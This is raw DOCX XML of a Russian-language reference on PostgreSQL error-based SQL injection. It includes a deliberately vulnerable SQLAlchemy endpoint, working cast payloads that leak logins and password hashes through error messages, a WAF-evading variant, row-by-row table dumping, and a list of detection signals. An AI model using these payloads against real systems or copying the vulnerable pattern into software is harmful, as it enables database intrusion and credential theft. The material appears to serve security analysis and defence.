        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.4 Извлечение метаданных через UNION +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pg_namespace</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Использованные источники из research: нет — категория покрывается официальной документацией PostgreSQL и стандартными SQLi-cheat-sheet (PortSwigger). UNION-based — универсальная техника.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Error-based через cast</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.0 Обзор категории</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Error-based extraction работает, когда сообщение об ошибке БД доходит до атакующего напрямую или транзитом через HTTP-ответ приложения. PostgreSQL генерирует подробные ошибки, в которые попадают пользовательские значения: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">invalid input syntax for type integer: "&lt;value&gt;"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relation "&lt;name&gt;" does not exist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division by zero</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invalid input value for type xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Атакующий заставляет cast или операцию провалиться на значении, вычисленном из подзапроса, и читает данные через текст ошибки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В категории четыре типа примитивов и один обязательный контекст:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Числовые касты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::numeric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::float8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — самый универсальный канал, 3.2.1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pP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 leak через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">relation "..." does not exist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, удобен для коротких строк, 3.2.2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Условная ошибка через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CASE WHEN ... THEN 1/0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — превращает boolean в error/no-error канал, мост в 3.3, 3.2.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XML-парсер через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 менее надёжный, но рабочий в специфичных кейсах, 3.2.4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Каналы доставки ошибки до атакующего (Django/SQLAlchemy/Spring) — без них вся категория не работает, 3.2.5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Канал работает только при наличии всех трёх условий одновременно: уязвимая точка инъекции + один из примитивов + один из путей пробрасывания ошибки. Снятие любого из трёх убирает категорию полностью.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.1 Числовые касты со вложенным SELECT</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Любая колонка целочисленного типа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или каст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вокруг выражения превращает PG-парсер в leak-канал: при попытке привести нечисловую строку к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">integer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG выдаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">invalid input syntax for type integer: "&lt;value&gt;"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&lt;value&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это то, что вернул подзапрос.</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># api/views.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from sqlalchemy.exc import DBAPIError</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@app.get("/products/{product_id}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def get_product(product_id: str):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = f"SELECT id, name, price FROM products WHERE id = {product_id}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        async with engine.begin() as conn:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            result = await conn.execute(text(sql))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            return [dict(row) for row in result.mappings()]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    except DBAPIError as exc:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        # Антипаттерн: текст исключения в ответе клиенту</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return {"error": str(exc)}, 500</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Базовое извлечение текущей роли:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT CAST(current_user AS int))</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CAST(current_user AS int))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В HTTP-ответе:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: invalid input syntax for type integer: "app_user"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Извлечение содержимого таблицы:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT CAST((SELECT login || '|' || password_hash FROM users LIMIT 1) AS int))</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CAST((SELECT login || '|' || password_hash FROM users LIMIT 1) AS int))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В ответе:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: invalid input syntax for type integer: "admin|$2b$12$abc...xyz"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эквивалентный postfix-каст для случаев, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CAST(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> режется WAF:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT (SELECT login FROM users LIMIT 1)::int)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Постраничный обход через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для извлечения всех строк:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT CAST((SELECT login || '|' || password_hash FROM users ORDER BY id OFFSET 0 LIMIT 1) AS int))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT CAST((SELECT login || '|' || password_hash FROM users ORDER BY id OFFSET 1 LIMIT 1) AS int))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserv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Каждый запрос возвращает HTTP 500 с одной строкой данных в теле ошибки. Атакующий извлекает таблицу построчно за столько запросов, сколько в ней строк.</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PostgreSQL применяет cast через input-функцию целевого типа — для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">integer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">int4in()</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src/backend/utils/adt/int.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Функция парсит строку и при провале вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">errmsg("invalid input syntax for type %s: \"%s\"", ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с включением исходной строки в текст ошибки. Длина включаемой строки в PG не ограничена — в отличие от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(63 байта NAMEDATALEN), числовые касты возвращают значение целиком. Подзапрос </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT ... FROM users LIMIT 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> исполняется внутри планировщика без специальных проверок — это легитимная скалярная конструкция. Конкатенация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нескольких полей превращает множественные значения в одну строку.</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Application-роль должна иметь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на таблицу-источник. Главное условие — наличие канала доставки ошибки (см. 3.2.5).</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Касты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CAST(... AS int)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> встречаются в SQL постоянно.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Конкретные сигналы атаки:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Каст применён к подзапросу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
